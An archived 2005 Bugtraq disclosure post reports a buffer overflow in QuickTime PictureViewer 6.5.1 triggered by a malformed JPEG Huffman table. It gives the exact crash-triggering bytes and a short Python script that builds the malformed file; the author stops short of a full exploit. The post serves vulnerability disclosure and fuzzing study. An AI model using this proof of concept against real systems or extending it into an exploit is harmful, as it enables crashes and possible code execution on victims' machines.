Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

QuickTime malformed JPEG buffer overflow

from [liquid] Network Security [Permanent Link]
Subject: QuickTime malformed JPEG buffer overflow
Date: 26 Mar 2005 23:08:48 -0000 


When fuzzing some application with malformed input files, if we want to 
discover some vulnerability we have to create input file which is very close to 
valid file but yet malformed in some way. In that way chances for discovery are 
greater.
Now let's play with JPEG format. We concentrate on Huffman table segment. 
Marker for DHT is 0xffc4. 

Now, take valid JPEG file and replace first DHT with this malformed DHT:

0xffc4021100ffff000000000000+0x01*510

Open this modified file with QuickTime PictureViewer (version 6.5.1) for 
Windows and QuickTime will crash with Windows reporting access violation error. 
Next step would be creating exploit, but I leave that to people with more skill 
in doing that.

Here is quick and dirty script in Python for creating such malformed file:

import struct
f=open(raw_input("enter the path to the input file:\n"),"rb")
a=f.read()
f.close()
n=a.index("\xff\xc4")
b=a[:n]+"\xff\xc4\x02\x11\x00\xff\xff"+"\x00"*14+"\x01"*510
+a[n+2+struct.unpack("!H",a[n+2:n+4])[0]:]
f=open(raw_input("enter the path to the output file:\n"),"wb")
f.write(b)
f.close()

For details about JPEG format take a look at:

http://www.w3.org/Graphics/JPEG/itu-t81.pdf
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • QuickTime malformed JPEG buffer overflow, liquid <=
Previous by Date:  AS/400 LDAP user accounts disclosure, Shalom Carmel
Next by Date:  RE: [bugtraq] Security Flaw with Digital signatures in Microsoft Outlook, Lyal Collins
Previous by Thread:  AS/400 LDAP user accounts disclosure, Shalom Carmel
Next by Thread:  File inclusion and XSS vulnerability in E-Store Kit-2 PayPal Edition, dcrab
Indexes:  [Date] [Thread] [Top] [All Lists]